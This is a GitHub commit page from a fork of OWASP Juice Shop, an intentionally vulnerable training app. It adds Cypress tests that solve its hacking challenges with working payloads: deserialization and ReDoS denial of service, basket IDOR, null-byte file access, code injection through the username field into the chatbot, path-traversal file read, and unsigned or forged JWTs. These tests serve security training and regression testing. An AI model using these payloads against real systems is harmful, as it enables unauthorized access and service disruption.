forked from juice-shop/juice-shop
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'origin/develop' into develop
- Loading branch information
Showing
26 changed files
with
873 additions
and
781 deletions.
There are no files selected for viewing
Validating CODEOWNERS rules …
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1 @@ | ||
/vagrant/ @wurstbrot | ||
/.github/workflows/lint-fixer.yml @J12934 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1,2 @@ | ||
custom: https://sponsor.owasp-juice.shop | ||
github: OWASP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,7 @@ | ||
{ | ||
"baseUrl": "http:https://localhost:3000", | ||
"defaultCommandTimeout": 10000 | ||
} | ||
"defaultCommandTimeout": 10000, | ||
"env": { | ||
"baseUrl": "http:https://localhost:3000" | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
describe("/b2b/v2/order", () => { | ||
describe('challenge "rce"', () => { | ||
it("an infinite loop deserialization payload should not bring down the server", () => { | ||
cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => { | ||
if (!disableOnContainerEnv) { | ||
cy.login({ email: "admin", password: "admin123" }); | ||
|
||
cy.window().then(() => { | ||
var xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status == 500) { | ||
console.log("Success"); | ||
} | ||
}; | ||
xhttp.open( | ||
"POST", | ||
`${Cypress.env("baseUrl")}/b2b/v2/orders/`, | ||
true | ||
); | ||
xhttp.setRequestHeader("Content-type", "application/json"); | ||
xhttp.setRequestHeader( | ||
"Authorization", | ||
`Bearer ${localStorage.getItem("token")}` | ||
); | ||
xhttp.send( | ||
JSON.stringify({ | ||
orderLinesData: "(function dos() { while(true); })()", | ||
}) | ||
); | ||
}); | ||
cy.expectChallengeSolved({ challenge: "Blocked RCE DoS" }); | ||
} | ||
}); | ||
}); | ||
}); | ||
|
||
describe('challenge "rceOccupy"', () => { | ||
it("should be possible to cause request timeout using a recursive regular expression payload", () => { | ||
cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => { | ||
if (!disableOnContainerEnv) { | ||
cy.login({ email: "admin", password: "admin123" }); | ||
cy.window().then(() => { | ||
var xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status == 503) { | ||
console.log("Success"); | ||
} | ||
}; | ||
xhttp.open( | ||
"POST", | ||
`${Cypress.env("baseUrl")}/b2b/v2/orders/`, | ||
true | ||
); | ||
xhttp.setRequestHeader("Content-type", "application/json"); | ||
xhttp.setRequestHeader( | ||
"Authorization", | ||
`Bearer ${localStorage.getItem("token")}` | ||
); | ||
xhttp.send( | ||
JSON.stringify({ | ||
orderLinesData: | ||
"/((a+)+)b/.test('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')", | ||
}) | ||
); | ||
}); | ||
cy.expectChallengeSolved({ challenge: "Successful RCE DoS" }); | ||
} | ||
}); | ||
}); | ||
}); | ||
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,171 @@ | ||
describe("/#/basket", () => { | ||
describe("as admin", () => { | ||
beforeEach(() => { | ||
cy.login({ email: "admin", password: "admin123" }); | ||
}); | ||
|
||
describe('challenge "negativeOrder"', () => { | ||
it("should be possible to update a basket to a negative quantity via the Rest API", () => { | ||
cy.window().then(() => { | ||
var xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status == 200) { | ||
console.log("Success"); | ||
} | ||
}; | ||
xhttp.open( | ||
"PUT", | ||
`${Cypress.env("baseUrl")}/api/BasketItems/1`, | ||
true | ||
); | ||
xhttp.setRequestHeader("Content-type", "application/json"); | ||
xhttp.setRequestHeader( | ||
"Authorization", | ||
`Bearer ${localStorage.getItem("token")}` | ||
); | ||
xhttp.send(JSON.stringify({ quantity: -100000 })); | ||
}); | ||
cy.visit("/#/order-summary"); | ||
|
||
// cy.get("mat-cell.mat-column-quantity > span").first().should("match",-100000) | ||
cy.get("mat-cell.mat-column-quantity > span") | ||
.first() | ||
.then(($ele) => { | ||
let quantity = $ele.text(); | ||
expect(quantity).to.match(/-100000/); | ||
}); | ||
}); | ||
|
||
it("should be possible to place an order with a negative total amount", () => { | ||
cy.visit("/#/order-summary"); | ||
cy.get("#checkoutButton").click(); | ||
cy.expectChallengeSolved({ challenge: "Payback Time" }); | ||
}); | ||
}); | ||
|
||
describe('challenge "basketAccessChallenge"', () => { | ||
it("should access basket with id from session storage instead of the one associated to logged-in user", () => { | ||
cy.window().then(() => { | ||
window.sessionStorage.bid = 3; | ||
}); | ||
|
||
cy.visit("/#/basket"); | ||
|
||
// TODO Verify functionally that it's not the basket of the admin | ||
cy.expectChallengeSolved({ challenge: "View Basket" }); | ||
}); | ||
}); | ||
|
||
describe('challenge "basketManipulateChallenge"', () => { | ||
it("should manipulate basket of other user instead of the one associated to logged-in user", () => { | ||
cy.window().then(() => { | ||
const xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status === 200) { | ||
console.log("Success"); | ||
} | ||
}; | ||
|
||
xhttp.open("POST", `${Cypress.env("baseUrl")}/api/BasketItems/`); | ||
xhttp.setRequestHeader("Content-type", "application/json"); | ||
xhttp.setRequestHeader( | ||
"Authorization", | ||
`Bearer ${localStorage.getItem("token")}` | ||
); | ||
xhttp.send( | ||
'{ "ProductId": 14,"BasketId":"1","quantity":1,"BasketId":"2" }' | ||
); //eslint-disable-line | ||
}); | ||
cy.expectChallengeSolved({ challenge: "Manipulate Basket" }); | ||
}); | ||
}); | ||
}); | ||
|
||
describe("as jim", () => { | ||
beforeEach(() => { | ||
cy.login({ email: "jim", password: "ncc-1701" }); | ||
}); | ||
describe('challenge "manipulateClock"', () => { | ||
it("should be possible to enter WMNSDY2019 coupon", () => { | ||
cy.window().then(() => { | ||
window.localStorage.couponPanelExpanded = false; | ||
}); | ||
cy.visit("/#/payment/shop"); | ||
|
||
// yahan bt aa rahi in the console commands | ||
cy.window().then((win) => { | ||
cy.on("uncaught:exception", (err, runnable) => { | ||
// Introduced to disbale the uncaught:exception we get after the eval under this as TypeError: Date.now is not a function | ||
return false; | ||
}); | ||
win.eval( | ||
'event = new Date("March 08, 2019 00:00:00"); Date = function(Date){return function() {date = event; return date; }}(Date);' | ||
); | ||
}); | ||
cy.get("#collapseCouponElement").click(); | ||
|
||
cy.get("#coupon").type("WMNSDY2019"); | ||
cy.get("#applyCouponButton").click(); | ||
}); | ||
|
||
it("should be possible to place an order with the expired coupon", () => { | ||
cy.visit("/#/order-summary"); | ||
cy.get("#checkoutButton").click(); | ||
cy.expectChallengeSolved({ challenge: "Expired Coupon" }); | ||
}); | ||
}); | ||
|
||
describe('challenge "forgedCoupon"', () => { | ||
it("should be able to access file /ftp/coupons_2013.md.bak with poison null byte attack", () => { | ||
cy.request(`${Cypress.env("baseUrl")}/ftp/coupons_2013.md.bak%2500.md`); | ||
}); | ||
|
||
it("should be possible to add a product in the basket", () => { | ||
cy.window().then(() => { | ||
var xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status === 201) { | ||
console.log("Success"); | ||
} | ||
}; | ||
xhttp.open( | ||
"POST", | ||
`${Cypress.env("baseUrl")}/api/BasketItems/`, | ||
true | ||
); | ||
xhttp.setRequestHeader("Content-type", "application/json"); | ||
xhttp.setRequestHeader( | ||
"Authorization", | ||
`Bearer ${localStorage.getItem("token")}` | ||
); | ||
xhttp.send( | ||
JSON.stringify({ | ||
BasketId: `${sessionStorage.getItem("bid")}`, | ||
ProductId: 1, | ||
quantity: 1, | ||
}) | ||
); | ||
}); | ||
}); | ||
|
||
it("should be possible to enter a coupon that gives an 80% discount", () => { | ||
cy.window().then(() => { | ||
window.localStorage.couponPanelExpanded = false; | ||
}); | ||
|
||
cy.visit("/#/payment/shop"); | ||
cy.get("#collapseCouponElement").click(); | ||
cy.task("GenerateCoupon", 90).then((coupon: string) => { | ||
cy.get("#coupon").type(coupon); | ||
cy.get("#applyCouponButton").click(); | ||
}); | ||
}); | ||
|
||
it("should be possible to place an order with a forged coupon", () => { | ||
cy.visit("/#/order-summary"); | ||
cy.get("#checkoutButton").click(); | ||
cy.expectChallengeSolved({ challenge: "Forged Coupon" }); | ||
}); | ||
}); | ||
}); | ||
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
describe("/chatbot", () => { | ||
beforeEach(() => { | ||
cy.login({ email: "admin", password: "admin123" }); | ||
}); | ||
|
||
describe('challenge "killChatbot"', () => { | ||
it("should be possible to kill the chatbot by setting the process to null", () => { | ||
cy.visit("/profile"); | ||
cy.get("#username").type( | ||
'admin"); process=null; users.addUser("1337", "test' | ||
); | ||
cy.get("#submit").click(); | ||
cy.visit("/#/chatbot"); | ||
|
||
cy.get("#message-input").type("hi").type("{enter}"); | ||
cy.get("#message-input").type("...").type("{enter}"); | ||
cy.get("#message-input").type("bye").type("{enter}"); | ||
|
||
cy.expectChallengeSolved({ challenge: "Kill Chatbot" }); | ||
}); | ||
}); | ||
|
||
describe('challenge "bullyChatbot"', () => { | ||
it("should be possible to make the chatbot hand out a coupon code", () => { | ||
cy.task("GetCouponIntent").then( | ||
(couponIntent: { | ||
utterances: Array<string>; | ||
intent: string; | ||
answers: Array<{ | ||
action: string; | ||
body: string; | ||
}>; | ||
}) => { | ||
cy.visit("/profile"); | ||
cy.get("#username").type( | ||
"admin\"); process=(query, token)=>{ if (users.get(token)) { return model.process(trainingSet.lang, query) } else { return { action: 'unrecognized', body: 'user does not exist' }}}; users.addUser(\"1337\", \"test", | ||
{ parseSpecialCharSequences: false } | ||
); | ||
cy.get("#submit").click(); | ||
cy.visit("/#/chatbot"); | ||
|
||
cy.get("#message-input").type("hi").type("{enter}"); | ||
cy.get("#message-input").type("...").type("{enter}"); | ||
for (let i = 0; i < 100; i++) { | ||
cy.get("#message-input") | ||
.type(couponIntent.utterances[0]) | ||
.type("{enter}"); | ||
} | ||
cy.expectChallengeSolved({ challenge: "Bully Chatbot" }); | ||
} | ||
); | ||
}); | ||
}); | ||
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
describe("/dataerasure", () => { | ||
beforeEach(() => { | ||
cy.login({ email: "admin", password: "admin123" }); | ||
}); | ||
|
||
describe('challenge "lfr"', () => { | ||
it("should be possible to perform local file read attack using the browser", () => { | ||
cy.window().then(() => { | ||
const xhttp = new XMLHttpRequest(); | ||
xhttp.onreadystatechange = function () { | ||
if (this.status === 200) { | ||
console.log("Success"); | ||
} | ||
}; | ||
const params = "layout=../package.json"; | ||
|
||
xhttp.open("POST", `${Cypress.env("baseUrl")}/dataerasure`); | ||
xhttp.setRequestHeader( | ||
"Content-type", | ||
"application/x-www-form-urlencoded" | ||
); | ||
xhttp.setRequestHeader("Origin", `${Cypress.env("baseUrl")}/`); | ||
xhttp.setRequestHeader( | ||
"Cookie", | ||
`token=${localStorage.getItem("token")}` | ||
); | ||
xhttp.send(params); //eslint-disable-line | ||
}); | ||
cy.visit("/"); | ||
cy.expectChallengeSolved({ challenge: "Local File Read" }); | ||
}); | ||
}); | ||
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
describe("/", () => { | ||
describe('challenge "jwtUnsigned"', () => { | ||
it("should accept an unsigned token with email [email protected] in the payload ", () => { | ||
cy.window().then(() => { | ||
localStorage.setItem( | ||
"token", | ||
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJkYXRhIjp7ImVtYWlsIjoiand0bjNkQGp1aWNlLXNoLm9wIn0sImlhdCI6MTUwODYzOTYxMiwiZXhwIjo5OTk5OTk5OTk5fQ." | ||
); | ||
}); | ||
cy.visit("/"); | ||
cy.expectChallengeSolved({ challenge: "Unsigned JWT" }); | ||
}); | ||
}); | ||
|
||
describe('challenge "jwtForged"', () => { | ||
it("should accept a token HMAC-signed with public RSA key with email [email protected] in the payload ", () => { | ||
cy.task("disableOnWindowsEnv").then((disableOnWindowsEnv) => { | ||
if (!disableOnWindowsEnv) { | ||
cy.window().then(() => { | ||
localStorage.setItem( | ||
"token", | ||
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImVtYWlsIjoicnNhX2xvcmRAanVpY2Utc2gub3AifSwiaWF0IjoxNTgzMDM3NzExfQ.gShXDT5TrE5736mpIbfVDEcQbLfteJaQUG7Z0PH8Xc8" | ||
); | ||
}); | ||
cy.visit("/#/"); | ||
|
||
cy.expectChallengeSolved({ challenge: "Forged Signed JWT" }); | ||
} | ||
}); | ||
}); | ||
}); | ||
}); |
Oops, something went wrong.